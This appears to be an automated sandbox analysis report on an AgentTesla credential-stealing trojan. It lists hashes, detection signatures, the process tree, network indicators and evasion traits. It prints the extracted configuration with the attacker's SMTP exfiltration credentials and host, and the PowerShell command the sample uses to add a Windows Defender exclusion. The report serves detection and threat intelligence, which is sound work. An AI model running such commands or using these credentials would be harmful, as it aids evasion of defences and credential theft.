Windows Analysis Report SecuriteInfo.com.Trojan.Mardom.MN.15.10720.19728

Overview

General Information

Sample Name: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.19728 (renamed file extension from 19728 to exe)
Analysis ID: 483768
MD5: f116c183d3684fe8c6d8435aef94fd41
SHA1: f92ea1cee647bbbae7ed522450428607f4ae3ee4
SHA256: 9664d7052873349992d586788296c16579941a802a41b70afdc08867b2153d65
Tags: exe

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected AntiVM3
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Injects a PE file into a foreign process
Sigma detected: Powershell Defender Exclusion
Adds a directory exclusion to Windows Defender
Moves itself to temp directory
Tries to steal Mail credentials (via file access)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Detected TCP or UDP traffic on non-standard ports
Contains functionality to detect virtual machines (SLDT)
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe (PID: 3740 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe' MD5: F116C183D3684FE8C6D8435AEF94FD41)
    • powershell.exe (PID: 6444 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Username": "administracion@insergejk.com", "Password": "42010892", "Host": "mail.insergejk.com"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000002.712631751.0000000002612000.00000004.00000001.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security |
00000007.00000002.937743659.0000000002BF1000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000007.00000002.937743659.0000000002BF1000.00000004.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000007.00000002.935726036.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000007.00000002.935726036.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
0.2.SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe.36caa98.4.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
0.2.SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe.36caa98.4.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
0.2.SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe.37dd780.5.raw.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
0.2.SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe.37dd780.5.raw.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
7.2.SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe.400000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

Sigma Overview

System Summary:

Sigma detected: Powershell Defender Exclusion
Source: Process started | Author: Florian Roth | Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe', ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, ParentProcessId: 3740, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe', ProcessId: 6444
Sigma detected: Non Interactive PowerShell
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe', ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, ParentProcessId: 3740, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe', ProcessId: 6444
Sigma detected: T1086 PowerShell Execution
Source: Pipe created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: PipeName: \PSHost.132761783863672192.6444.DefaultAppDomain.powershell

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 7.2.SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe.400000.0.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "administracion@insergejk.com", "Password": "42010892", "Host": "mail.insergejk.com"}
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | ReversingLabs: Detection: 13%
Source: 7.2.SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8
Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49843 -> 64.202.184.79:587
Source: Joe Sandbox View | ASN Name: AS-26496-GO-DADDY-COM-LLCUS
Source: Joe Sandbox View | IP Address: 64.202.184.79
Source: global traffic | TCP traffic: 192.168.2.4:49843 -> 64.202.184.79:587
Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000007.00000002.937743659.0000000002BF1000.00000004.00000001.sdmp | String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000007.00000002.937743659.0000000002BF1000.00000004.00000001.sdmp | String found in binary or memory: http://DynDns.comDynDNS
Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000007.00000002.938832005.0000000002F4D000.00000004.00000001.sdmp | String found in binary or memory: http://insergejk.com
Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000007.00000002.938832005.0000000002F4D000.00000004.00000001.sdmp | String found in binary or memory: http://mail.insergejk.com
Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.712594836.0000000002601000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000007.00000002.937743659.0000000002BF1000.00000004.00000001.sdmp | String found in binary or memory: http://uEmkbr.com
Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.712100291.0000000000C67000.00000004.00000040.sdmp | String found in binary or memory: http://www.fontbureau.como
Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.712100291.0000000000C67000.00000004.00000040.sdmp | String found in binary or memory: http://www.fontbureau.comoitud
Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000007.00000002.938814213.0000000002F47000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000007.00000002.937743659.0000000002BF1000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000007.00000003.916484773.0000000000C34000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000007.00000002.938715206.0000000002F10000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000007.00000002.938861011.0000000002F57000.00000004.00000001.sdmp | String found in binary or memory: https://GfxT7Yj8XaSeYQqdvs.com
Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.713196181.0000000003609000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000007.00000002.935726036.0000000000402000.00000040.00000001.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000007.00000002.937743659.0000000002BF1000.00000004.00000001.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: unknown | DNS traffic detected: queries for: mail.insergejk.com

System Summary:

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Code function: 0_2_0245C924
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Code function: 0_2_0245ECE0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Code function: 0_2_0245ECF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Code function: 7_2_00C118D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Code function: 7_2_00C1ACD8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Code function: 7_2_00C164E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Code function: 7_2_00C1D4F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Code function: 7_2_00C13188
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Code function: 7_2_00C181A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Code function: 7_2_00C171A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Code function: 7_2_01051960
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Code function: 7_2_01051850
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Code function: 7_2_01056488
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Code function: 7_2_0105AEE8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Code function: 7_2_01056C20
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Code function: 7_2_0105C748
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Code function: 7_2_0105EE4A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Code function: 7_2_0105A2A8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Code function: 7_2_01058ED0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Code function: 7_2_011247A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Code function: 7_2_011246B0
Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.718029537.00000000083B0000.00000004.00020000.sdmp | Binary or memory string: OriginalFilenameEnvoySinks.dll6 vs SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe
Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.717400332.0000000006BD0000.00000004.00020000.sdmp | Binary or memory string: OriginalFilenameCF_Secretaria.dll< vs SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe
Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.710812445.00000000002E8000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameStaticArrayInitTypeSize8.exeh$ vs SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe
Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.713196181.0000000003609000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameYxrQNXqVpQjbEwBXrxdpqkJllwDzZfeFOxwSyEQ.exe4 vs SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe
Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000007.00000000.709734968.00000000007A8000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameStaticArrayInitTypeSize8.exeh$ vs SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe
Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000007.00000002.935726036.0000000000402000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenameYxrQNXqVpQjbEwBXrxdpqkJllwDzZfeFOxwSyEQ.exe4 vs SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe
Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000007.00000002.935992819.0000000000B58000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe
Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Binary or memory string: OriginalFilenameStaticArrayInitTypeSize8.exeh$ vs SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe
Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe'
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe.log
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dvugezh2.wz1.ps1
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@6/5@2/1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6532:120:WilError_01
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | File read: C:\Windows\System32\drivers\etc\hosts (3 identical entries)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Code function: 0_2_002329B2 push 20000001h; retf 0_2_002329C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Code function: 0_2_0245FAD0 pushfd ; retf 0_2_0245FAD1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Code function: 7_2_006F29B2 push 20000001h; retf 7_2_006F29C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Code function: 7_2_00C1F870 push edi; retf 7_2_00C1F8BE
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Code function: 7_2_0105D178 push 6F040104h; retf 7_2_0105D1BE
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Code function: 7_2_0105003B push edi; retf 7_2_0105003E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Code function: 7_2_0105CCE0 push ebx; retf 7_2_0105CDCE
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Code function: 7_2_0105F350 push esp; retf 7_2_0105F396
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Code function: 7_2_0105E65A push ebx; retf 7_2_0105E666
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Code function: 7_2_01050293 push edi; retf 7_2_01050296
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Code function: 7_2_010502B4 push esp; iretd 7_2_010502C3
Source: initial sample | Static PE information: section name: .text entropy: 7.45346682552

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Moves itself to temp directoryShow sources
                      Source: c:\users\user\desktop\securiteinfo.com.trojan.mardom.mn.15.10720.exeFile moved: C:\Users\user\AppData\Local\Temp\tmpG177.tmpJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe Process information set: NOOPENFILEERRORBOX (reported 37 times)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (reported 118 times)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe Process information set: NOOPENFILEERRORBOX (reported a further 51 times)
Note: SEM_NOOPENFILEERRORBOX (SetErrorMode) only suppresses the message box OpenFile would show when a file is not found. The legitimate powershell.exe child sets it just as often here, so on its own this observation is not evidence of hiding or protection.

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match File source: 00000000.00000002.712631751.0000000002612000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe PID: 3740, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.712631751.0000000002612000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.712631751.0000000002612000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
